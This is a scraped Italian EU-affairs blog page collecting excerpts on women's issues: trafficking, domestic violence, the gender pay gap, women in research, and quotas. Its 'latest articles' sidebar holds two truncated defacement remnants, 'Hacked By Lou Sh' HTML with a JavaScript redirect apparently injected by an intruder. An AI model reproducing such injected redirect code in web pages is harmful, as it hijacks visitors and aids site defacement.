EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Donne

Donne


Donne

it

All'Istituto italiano di Cultura di Bruxelles è tutto pronto per il seminario Women Leaders in International Relations.

Dall’8 al 12 luglio l’Istituto italiano di Cultura di Bruxelles ospiterà l’incontro “Women Leaders in International Relations”, organizzato dallo stesso Istituto in collaborazione con "Women in Public Service" Project (WPSP) dell’ex segretario di Stato americano Hillary Clinton e la Scuola superiore (...)

it

Sfortunatamente la tratta di esseri umani è oggi più che mai una terribile piaga sociale che necessita di un contrasto unito e deciso da parte delle istituzioni.

Nell’Unione europea, nel periodo 2008-2010, sono state 23.632 le vittime di tale reato, la maggioranza di queste (68%) sono donne. Infatti buona parte delle persone identificate negli anni sopracitati è stata venduta ai fini di sfruttamento sessuale, seguita da quella destinata ai lavori (...)

it

Il Parlamento europeo ha votato per sostenere la proposta della Commissione europea riguardo la legge per l’attuazione di una maggiore tutela per le vittime di violenza, in particolare quella domestica, valida in tutta Europa.

Il Parlamento europeo ha votato per sostenere la proposta della Commissione europea riguardo la legge per l’attuazione di una maggiore tutela per le vittime di violenza, in particolare quella domestica, valida in tutta Europa. La nuova norma, rivolta in particolare alle moltissime donne che (...)

it

Di tutti i ricercatori europei, le persone di sesso femminile rappresentano soltanto il 33%, cioè soltanto uno su tre. Questa percentuale in realtà è in aumento, il che rende ancora meglio l'idea dell'arretratezza del nostro continente rispetto agli altri. La cifre si abbassano ancora di più se si osservano i dati riguardanti il numero di professoresse impiegate ordinariamente (20% rispetto agli uomini) e di donne che gestiscono le istituzioni nell'ambito dell'istruzione superiore, soltanto il 15,5%. E' chiaro che dati come questi non possono che far preoccupare: il sessismo in ambito lavorativo sembra ancora essere presente e ricompare prepotentemente dinanzi a notizie come questa.

La Commissaria europea per la ricerca, la scienza e l’innovazione, Máire Geoghegan-Quinn, ha espresso il proprio dissenso verso questi risultati: "Nonostante alcuni progressi negli ultimi anni, le donne nel campo della ricerca rimangono una minoranza, ed è come se una barriera invisibile (...)

it

Secondo l'OMS (Organizzazione mondiale della sanità), rientrano nella definizione di mutilazioni genitali femminili (MGF) quelle pratiche che comportano la rimozione parziale o totale degli organi genitali esterni femminili e tutte le azioni lesive di questi stessi organi, non effettuate per motivi medici.

Sempre più spesso le MGF vengono praticate per motivazioni culturali, sociali e/o religiose, ai danni di bambine e ragazze, dalla più tenera età fino ai 15 anni. Queste pratiche generano gravi conseguenze sia sul piano fisico che psicologico e costituiscono una forma di abuso di minori e di (...)

it

Con la sentenza Test-Achats le donne europee al volante si ritroveranno a pagare premi assicurativi più elevati. Si avrà infatti in media un aumento delle tariffe per le donne del 4% circa, mentre in precedenza pagavano tariffe minori rispetto agli uomini che invece avranno una situazione praticamente invariata. Dunque le donne pagheranno tariffe più alte ma in nome della parità dei sessi e della non discriminazione, e non in nome del detto che vuole “donna al volante, pericolo costante”.

La tariffazione unisex è stata introdotta dalla sentenza Test-Achats, emessa dalla Corte di giustizia europea il 1 marzo 2011, la quale sancisce la parità di genere nei contratti assicurativi e si rivolge in particolare ai nuovi contratti (quelli stipulati dopo il 21 dicembre 2012), ai rapporti (...)

it

E' notizia di questi giorni la lettera sottoscritta da ben nove Paesi membri UE e indirizzata al Presidente della Commissione europea Josè Manuel Barroso e alla Vicepresidente della Commissione Viviane Reding.

Fonte dell’indiscrezione è il Financial Times. Il quotidiano inglese sostiene che gli Stati di Olanda, Estonia, Lettonia, Bulgaria, Lituania, Repubblica Ceca, Ungheria e Malta avrebbero firmato il testo redatto dalla Gran Bretagna, al fine di affermare la propria contrarietà riguardo (...)

it

Donne che ricoprono alcuni dei più importanti incarichi nelle massime istituzioni europee ce ne sono. Questione chiusa? No di certo. Il problema della parità dei sessi nel processi decisionali, soprattutto in campo economico, esiste ed è reale. Perché deve far notizia che una donna rivesta un ruolo di primissimo livello internazionale? Perché per una donna deve essere, ancora oggi, così difficile provare di essere all'altezza dei signori colleghi uomini? Perché avere una carriera brillante deve voler dire rinunciare ad una famiglia? Scoprite con l'aiuto del neo-Direttore dell'Istituto Italiano di cultura a Bruxelles, Federiga Bindi, quanto lunga è ancora la strada da percorrere per arrivare ad una parità che non sia tale solo in virtù di vuote retoriche sull'argomento.

Viviane Reding, Commissario europeo per la Giustizia, Diritti Fondamentali e Cittadinanza, non ci sta. Il percorso dell’Unione Europea verso il raggiungimento di una piena parità di genere, soprattutto negli impieghi del settore pubblico-amministrativo, è ancora lontano dal suo compimento. Troppo (...)

it

Si è conclusa lo scorso 2 marzo la seconda edizione del Premio “Immagini amiche”. Scopo dell’iniziativa è sradicare tutti gli stereotipi di donna, talvolta sessisti, proposti dalla pubblicità e non solo, stimolando i creativi ad impegnarsi per la produzione di una buona comunicazione che sia quanto più possibile rispettosa dell’immagine femminile.

Il modello di donna che ormai da tempo televisione e pubblicità in generale ci propongono con insistenza è sempre il solito: bella, giovane, quasi eterea, e di conseguenza stupida. Perché sì, il binomio bellezza/intelligenza non può e non deve esistere, perlomeno in Italia. Ma d’altronde non si può (...)

it

Il rapporto ha anticipato di qualche giorno la Giornata Europea per la parità retributiva che si è tenuta il 5 Marzo.

Il dato, per quanto preoccupante possa essere, è comunque in miglioramento rispetto agli anni precedenti, nei quali si aggirava intorno al 17%. In Italia la percentuale è per fortuna più bassa rispetto alla media, nel nostro paese le donne guadagnano il 5,5% in meno degli uomini. In altri paesi la (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France